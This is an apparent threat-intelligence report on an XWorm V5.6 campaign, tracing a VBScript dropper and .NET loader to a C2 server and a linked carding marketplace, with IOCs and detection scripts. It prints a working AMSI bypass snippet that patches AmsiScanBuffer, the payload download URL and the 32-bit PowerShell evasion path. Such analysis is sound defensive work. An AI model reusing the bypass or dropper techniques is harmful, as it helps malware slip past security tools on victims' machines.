XWorm V5.6 Meets Carding Shop: Inside a Brazilian Operator's Vertically Integrated Cybercrime Pipeline
Published: 2026-03-14 Author: GHOST -- Breakglass Intelligence Tags: XWorm, RAT, carding, fraud, AMSI-bypass, .NET, process-injection, Brazil, vertical-integration Attribution: Reported via @abuse_ch MalwareBazaar
TL;DR
A VBScript dropper masquerading as a French real-estate document delivers XWorm V5.6 through a three-stage chain with Brazilian Portuguese anti-analysis padding and a reflective AMSI bypass. The interesting part is not the RAT -- it is what sits on the secondary C2 server. The same operator runs both the XWorm infrastructure on one DigitalOcean box and "Iluminat Store infosCC," a Portuguese-language carding marketplace, on a Contabo server in Germany. Both run identical Windows XAMPP stacks. The stolen credentials from XWorm victims likely feed directly into the Iluminat Store inventory. This is vertical integration of cybercrime: harvest credentials with the RAT, monetize them through the card shop, same operator, same infrastructure fingerprint.
The Lure: French Real Estate, Brazilian Code
The initial dropper is Projet20Immobilier.vbs -- a VBScript file using a French real-estate project filename as the social engineering lure. The target demographic is French-speaking victims, but the code tells a different story about who built it.
Buried in the 600+ lines of source are anti-analysis padding functions written in Brazilian Portuguese:
```vbscript
' Junk function padding — Portuguese variable names throughout
Function LixoCalc1(a, b)
    ' "lixo" = garbage in Portuguese
    LixoCalc1 = a + b
End Function
Function LixoText1(t)
    ' "código real começa depois" = real code starts after
    LixoText1 = t & " lixo"
End Function
```
These are not functional. LixoCalc1, LixoCalc2, LixoText1, LixoText2 -- dozens of them, all dead code. Their sole purpose is to inflate the script, break static analysis signatures, and push the actual payload past AV scanner byte-window limits. The developer comments -- "lixo" (garbage), "codigo real" (real code) -- confirm a native Brazilian Portuguese speaker.
The functional payload downloads a .NET loader from http://157.245.45.38/in.txt, but the URL is not stored in plaintext. The script uses a simple substitution cipher -- !! is replaced with A at runtime -- to obscure strings from static scanners. Not sophisticated, but effective against signature-based detection that looks for raw URLs.
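The two static-analysis tricks described above (junk `Lixo*` padding and the `!!` to `A` substitution) are easy to undo mechanically once you know the pattern. The triage script below is an added example written for this post, not code from the dropper or from Breakglass; it runs over a constructed VBScript fragment that mimics the structure described here (only the URL, the SysWOW64 PowerShell path and the `Lixo*` names are taken from the report). It learns the substitution pair from the script's own `Replace()` call, applies it to every string literal, and pulls out URLs, Windows paths and the junk-function ratio.

```python
import re
from dataclasses import dataclass

# Constructed VBScript fragment written for this example in the style the
# report describes. It is NOT the dropper's real source: only the IOC strings
# (URL, SysWOW64 PowerShell path, Lixo* names) come from the report. The
# letter "A" in one ProgID is stored as "!!" and restored by Replace() at
# runtime, which is the substitution trick the text describes.
SAMPLE_VBS = r'''
' Junk function padding
Function LixoCalc1(a, b)
    LixoCalc1 = a + b
End Function
Function LixoText1(t)
    LixoText1 = t & " lixo"
End Function
Function Fetch(u)
    Dim h: Set h = CreateObject(Replace("MSXML2.XMLHTTP", "!!", "A"))
    Dim s: Set s = CreateObject(Replace("!!DODB.Stream", "!!", "A"))
    Fetch = u
End Function
Dim url: url = "http://157.245.45.38/in.txt"
Dim ps: ps = "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
'''

# Replace(<anything>, "<old>", "<new>") -- the runtime deobfuscation call
REPLACE_CALL = re.compile(r'Replace\s*\([^,]+,\s*"([^"]*)"\s*,\s*"([^"]*)"\s*\)', re.I)
STRING_LITERAL = re.compile(r'"([^"]*)"')
URL_RE = re.compile(r'https?://[^\s"\']+', re.I)
WIN_PATH_RE = re.compile(r'[A-Za-z]:\\[^\s"]+')
FUNC_RE = re.compile(r'^\s*Function\s+(\w+)\s*\(', re.I | re.M)


@dataclass
class Triage:
    substitutions: list   # (old, new) pairs recovered from Replace() calls
    strings: list         # all string literals after substitution
    urls: list
    paths: list
    junk_functions: list  # functions whose name starts with "Lixo"
    junk_ratio: float     # junk functions / all functions


def find_substitutions(src: str) -> list:
    """Collect every (old, new) pair the script itself passes to Replace()."""
    return list(dict.fromkeys(REPLACE_CALL.findall(src)))


def decode(literal: str, subs: list) -> str:
    """Apply the script's own substitutions to one string literal."""
    for old, new in subs:
        literal = literal.replace(old, new)
    return literal


def triage_vbs(src: str) -> Triage:
    subs = find_substitutions(src)
    tokens = {t for pair in subs for t in pair}   # skip the "!!" / "A" arguments themselves
    strings = []
    for lit in STRING_LITERAL.findall(src):
        if lit and lit not in tokens:
            strings.append(decode(lit, subs))
    strings = list(dict.fromkeys(strings))
    joined = "\n".join(strings)
    urls = list(dict.fromkeys(URL_RE.findall(joined)))
    paths = list(dict.fromkeys(WIN_PATH_RE.findall(joined)))
    funcs = FUNC_RE.findall(src)
    junk = [f for f in funcs if f.lower().startswith("lixo")]
    ratio = len(junk) / len(funcs) if funcs else 0.0
    return Triage(subs, strings, urls, paths, junk, ratio)


if __name__ == "__main__":
    t = triage_vbs(SAMPLE_VBS)
    print("substitutions:", t.substitutions)
    print("urls:", t.urls)
    print("paths:", t.paths)
    print(f"junk functions: {t.junk_functions} ({t.junk_ratio:.0%} of all functions)")
```

A high junk ratio plus a download-capable ProgID (`MSXML2.XMLHTTP`, `ADODB.Stream`) that only appears after substitution is the combination worth alerting on; neither signal alone is unusual in legitimate scripts.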
The Kill Chain: VBS to InstallUtil.exe Injection
```text
Stage 1: Projet20Immobilier.vbs (VBScript dropper)
  | Downloads from 157.245.45.38/in.txt ("!!" → "A" deobfuscation)
  | Forces 32-bit PowerShell via SysWOW64
  |
Stage 2: ClassLibrary2.dll (.NET loader)
  | Reflective AMSI bypass
  | Downloads + decodes XWorm payload
  |
Stage 3: XWorm V5.6
  | Injected into InstallUtil.exe (LOLBin)
  | C2: 157.245.45.38:7771
```
The SysWOW64 Trick
The VBS dropper does not invoke PowerShell directly. It explicitly calls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -- the 32-bit version. This is a deliberate evasion technique. Most EDR products hook ntdll.dll and amsi.dll in 64-bit processes. By forcing execution into the WoW64 subsystem, the loader operates in a 32-bit address space where many 64-bit hooks do not reach. The AMSI bypass that follows becomes significantly more reliable in this context.
The AMSI Bypass: Reflective Memory Patching
ClassLibrary2.dll performs a textbook reflective AMSI bypass before loading the final payload:
```csharp
// Simplified from decompiled .NET IL
IntPtr amsiDll = LoadLibrary("amsi.dll");
IntPtr scanBuffer = GetProcAddress(amsiDll, "AmsiScanBuffer");
// Make memory writable
VirtualProtect(scanBuffer, (UIntPtr)8, 0x40, out uint oldProtect); // PAGE_EXECUTE_READWRITE
// Patch AmsiScanBuffer to return AMSI_RESULT_CLEAN
byte[] patch = { 0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3 }; // mov eax, 0x80070057; ret
Marshal.Copy(patch, 0, scanBuffer, patch.Length);
// Restore original protection
VirtualProtect(scanBuffer, (UIntPtr)8, oldProtect, out _);
```
The patch overwrites the first 6 bytes of AmsiScanBuffer with mov eax, 0x80070057; ret -- returning E_INVALIDARG, which tells the caller "scan failed, proceed anyway." The VirtualProtect call grants RWX permissions, Marshal.Copy writes the patch, then permissions are restored to cover the tracks. This is a well-documented technique (first published circa 2018), but the RWX-then-restore pattern is a step above the lazy implementations that leave RWX permanently.
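Because the bypass lives entirely in the first few bytes of an exported function, the defensive counterpart is a memory-integrity check: read the prologue of `AmsiScanBuffer` (and siblings) in a running process and ask whether it has been replaced by a "return a constant" stub. The checker below is an added example written for this post, not Breakglass or vendor code. It decodes the three stub shapes that such patches take (bare `ret`, `xor eax,eax; ret`, `mov eax,imm32; ret`), reports the HRESULT a patched function would hand back, and flags an exact match on the bytes recovered from ClassLibrary2.dll. The "unpatched" prologue bytes in the sample are a constructed stand-in; the genuine `AmsiScanBuffer` prologue varies by build and is not reproduced here.

```python
import struct

# Patch bytes the report recovered from ClassLibrary2.dll: mov eax, 0x80070057 ; ret
AMSI_PATCH_FROM_REPORT = bytes.fromhex("B857000780C3")

# HRESULT values a stub can return; both names are standard Windows constants.
HRESULT_NAMES = {0x80070057: "E_INVALIDARG", 0x00000000: "S_OK"}


def decode_stub(prologue: bytes):
    """Recognise a 'return a constant' stub at the start of a function.

    Returns (pattern_name, value_left_in_eax) or None when the bytes do not
    begin with such a stub. Only the first instruction(s) are inspected.
    """
    if not prologue:
        return None
    if prologue[0] == 0xC3:                                   # ret
        return ("ret", None)
    if prologue[:2] in (b"\x31\xC0", b"\x33\xC0") and prologue[2:3] == b"\xC3":
        return ("xor eax,eax; ret", 0)                        # returns S_OK
    if len(prologue) >= 6 and prologue[0] == 0xB8 and prologue[5] == 0xC3:
        imm32 = struct.unpack_from("<I", prologue, 1)[0]      # little-endian immediate
        return ("mov eax,imm32; ret", imm32)
    return None


def check_export(name: str, prologue: bytes) -> dict:
    """Classify one exported function's prologue as patched or not."""
    stub = decode_stub(prologue[:8])
    if stub is None:
        return {"export": name, "patched": False}
    pattern, value = stub
    hresult = None if value is None else HRESULT_NAMES.get(value, f"0x{value:08X}")
    return {
        "export": name,
        "patched": True,
        "pattern": pattern,
        "returns": value,
        "hresult": hresult,
        "matches_report_signature": prologue[:6] == AMSI_PATCH_FROM_REPORT,
    }


def scan_exports(exports: dict) -> list:
    """Run check_export over a {export_name: prologue_bytes} mapping."""
    return [check_export(n, p) for n, p in exports.items()]


if __name__ == "__main__":
    # Constructed sample: one export carrying the report's patch bytes, one
    # with a placeholder prologue standing in for unmodified code.
    sample = {
        "AmsiScanBuffer": AMSI_PATCH_FROM_REPORT + b"\x90" * 4,
        "AmsiScanString": bytes.fromhex("4C8BDC49895B08"),   # constructed, not the real bytes
    }
    for finding in scan_exports(sample):
        print(finding)
```

Reading the prologue bytes out of a live process is the platform-specific part (a memory-read primitive from your EDR or a debugger); the classification above is what turns those bytes into a high-confidence verdict, and the `E_INVALIDARG` decode explains why the caller proceeds: it sees a failed scan, not a malicious one.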
After AMSI is blinded, the loader downloads the XWorm payload, decodes it, and injects it into InstallUtil.exe -- a Microsoft-signed .NET utility that lives in the framework directory. Using InstallUtil as the injection target is a Living-off-the-Land Binary (LOLBin) technique: the process is legitimate, signed, and typically whitelisted by application control policies.
XWorm V5.6: Configuration and Capabilities
The XWorm config was decrypted from the injected payload:
| Field | Value |
|---|---|
| Version | XWorm V5.6 |
| C2 | 157.245.45.38:7771 |
| Mutex | 7VhafN70XMAdlUsS |
| KEY | <123456789> |
| Install | false (fileless) |
The KEY field is the critical OPSEC failure here. <123456789> is the default XWorm encryption key -- the value that ships in the builder when you first open it. Every XWorm operator is supposed to change this. Leaving it at default means any researcher who has used XWorm's builder can decrypt this operator's C2 traffic with zero effort. It also means the mutex-derived AES key for config encryption is predictable, making automated extraction trivial.
This sample was originally misclassified as AsyncRAT on MalwareBazaar. The V5.6 version string and the <Xwormmm>-style delimiter structure confirmed XWorm after manual analysis.
Command Set
XWorm V5.6 is a full-featured RAT. The decrypted command handler table includes:
| Category | Commands |
|---|---|
| Surveillance | screenshot, keylog_start, camera_capture, audio_record |
| Remote Access | shell_exec, file_upload, file_download, process_list, process_kill |
| Network | ddos_start, ddos_stop, hosts_file_edit |
| Persistence | usb_spread, startup_add, registry_persist |
| Destruction | ransomware_plugin, wipe_disk |
| Evasion | disable_defender, disable_uac, disable_firewall |
The hosts_file_edit command is particularly relevant to the carding angle -- it enables DNS hijacking on the victim's machine, which can redirect banking domains to phishing pages for real-time credential capture. The ransomware_plugin interface suggests the operator has access to encryption modules, though none were observed deployed.
Dual Infrastructure: The Real Story
This is where the investigation diverged from a routine XWorm analysis. The primary C2 at 157.245.45.38 was expected. The secondary server was not.
Primary C2: 157.245.45.38 (DigitalOcean)
| Service | Details |
|---|---|
| XWorm C2 | Port 7771 |
| Web Server | Apache/2.4 (XAMPP, Win64) |
| Open Directory | 11+ payload variants visible |
| Payload Hosting | /in.txt (ClassLibrary2.dll, obfuscated) |
The open directory on the primary C2 contained at least 11 payload variants -- different builds of the VBS dropper and .NET loader, suggesting active A/B testing of delivery mechanisms or targeting multiple campaigns simultaneously.
Secondary C2: 194.163.168.11 (Contabo, Germany)
| Service | Details |
|---|---|
| Carding Marketplace | "Iluminat Store infosCC" -- Portuguese-language |
| REST API Panel | Custom C2 management interface |
| PowerShell Beacon | /api/ endpoint (persistent callback) |
| XWorm Management | Secondary RAT control functions |
| Web Server | Apache/2.4 (XAMPP, Win64) |
The secondary server runs two things: a custom REST API panel with XWorm management capabilities, and Iluminat Store -- a Portuguese-language carding marketplace selling stolen credit card data and gift cards.
The Same Operator
Both servers run identical software stacks: Apache on Windows with XAMPP. The same operator fingerprint -- down to the XAMPP configuration artifacts and directory structure conventions -- appears on both boxes. The PowerShell beacon on the secondary C2's /api/ endpoint provides persistent access from compromised machines, creating a bridge between the RAT infrastructure and the fraud operation.
Vertical Integration: From RAT to Card Shop
Most malware investigations find one thing. A RAT campaign. A phishing kit. A carding shop. This investigation found the full pipeline on connected infrastructure operated by the same individual.
The business model:
- Harvest -- XWorm V5.6 deploys to victims via the French real-estate lure. Keylogger, clipboard monitor, and browser credential recovery capture financial data.
- Hosts file hijack -- DNS manipulation redirects banking sites to attacker-controlled pages for real-time card capture.
- Aggregate -- Stolen card data flows to the operator's infrastructure.
- Monetize -- Cards appear as inventory in Iluminat Store, sold to other criminals for cash-out.
The "Iluminat Store infosCC" name itself is a tell. "InfosCC" is Brazilian underground slang for "informações de cartão de crédito" -- credit card information. The store sells stolen cards and gift cards to downstream buyers, creating a second revenue stream beyond whatever the RAT itself yields through direct access to victim machines.
This is not a sophisticated APT. This is a Brazilian cybercriminal who built a vertically integrated operation: steal the data yourself, sell it yourself, cut out the middleman. The default XWorm encryption key and the exposed open directories suggest a mid-skill operator who compensates for poor OPSEC with operational volume.
MITRE ATT&CK Mapping
| Technique | ID | Implementation |
|---|---|---|
| User Execution: Malicious File | T1204.002 | Projet20Immobilier.vbs real-estate lure |
| Command and Scripting: VBScript | T1059.005 | VBS dropper with Portuguese junk padding |
| Command and Scripting: PowerShell | T1059.001 | SysWOW64 32-bit PowerShell forced execution |
| Impair Defenses: Disable or Modify Tools | T1562.001 | Reflective AMSI bypass via AmsiScanBuffer patch |
| Signed Binary Proxy Execution: InstallUtil | T1218.004 | XWorm injected into InstallUtil.exe |
| Obfuscated Files: Indicator Removal from Tools | T1027.005 | !! to A string substitution, 600+ junk lines |
| Ingress Tool Transfer | T1105 | HTTP download of ClassLibrary2.dll |
| Input Capture: Keylogging | T1056.001 | XWorm keylogger module |
| Clipboard Data | T1115 | XWorm clipboard capture |
| Screen Capture | T1113 | XWorm screenshot command |
| Video Capture | T1125 | XWorm camera capture |
| System Network Configuration Discovery | T1016 | Hosts file modification for DNS hijack |
| Replication Through Removable Media | T1091 | USB spread capability |
| Non-Standard Port | T1571 | C2 on port 7771 |
| Proxy: Multi-hop Proxy | T1090.003 | Dual C2 infrastructure across providers |
Indicators of Compromise
Network IOCs
| IOC | Type | Description |
|---|---|---|
| 157.245.45.38 | IP | Primary C2 -- XWorm listener port 7771, payload hosting (DigitalOcean) |
| 157.245.45.38:7771 | IP:Port | XWorm V5.6 C2 callback |
| 194.163.168.11 | IP | Secondary C2 -- Iluminat Store carding shop + REST API panel (Contabo DE) |
| 194.163.168.11/api/ | URL | PowerShell persistent beacon endpoint |
| 157.245.45.38/in.txt | URL | ClassLibrary2.dll payload (obfuscated) |
File IOCs
| Indicator | Type | Description |
|---|---|---|
| Projet20Immobilier.vbs | Filename | VBScript dropper, French real-estate lure |
| ClassLibrary2.dll | Filename | .NET loader with AMSI bypass |
| LixoCalc1, LixoCalc2, LixoText1, LixoText2 | Function names | Portuguese junk padding functions |
XWorm Configuration
```text
Version:    XWorm V5.6
C2:         157.245.45.38:7771
Mutex:      7VhafN70XMAdlUsS
KEY:        <123456789> (DEFAULT — unchanged from builder)
Delimiter:  <Xwormmm>
Injection:  InstallUtil.exe
```
Host Indicators
```text
# AMSI bypass signature — AmsiScanBuffer patch bytes
B8 57 00 07 80 C3 (mov eax, 0x80070057; ret)

# 32-bit PowerShell execution from VBScript
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

# Mutex
7VhafN70XMAdlUsS

# URL deobfuscation pattern
String replacement: "!!" → "A" in download URLs
```
Detection Guidance
Network: Alert on outbound TCP to 157.245.45.38:7771 and any HTTP traffic to 194.163.168.11/api/. Monitor for <Xwormmm> delimiter in TCP streams -- XWorm's field separator is transmitted in cleartext when using the default key.
Endpoint: Flag InstallUtil.exe spawned by powershell.exe where the PowerShell parent was invoked from the SysWOW64 path (32-bit forced execution). Monitor for VirtualProtect calls targeting amsi.dll memory regions followed by Marshal.Copy -- the AMSI bypass signature. The specific patch bytes B8 57 00 07 80 C3 at the start of AmsiScanBuffer are a high-confidence indicator.
Threat hunting: Search for VBScript files containing Portuguese strings (lixo, codigo, resultado) combined with HTTP download functions. The combination of a Romance-language lure filename with Portuguese source comments is a distinctive operator fingerprint.
This investigation was conducted by GHOST for Breakglass Intelligence. The dual-infrastructure finding -- RAT C2 colocated with a carding marketplace -- represents a pattern worth tracking. Operators who control the full chain from initial access to monetization are harder to disrupt because there is no marketplace dependency, no affiliate relationship, no external party that can be pressured. The entire operation lives and dies with one person.
Breakglass Intelligence -- Automated OSINT by BGI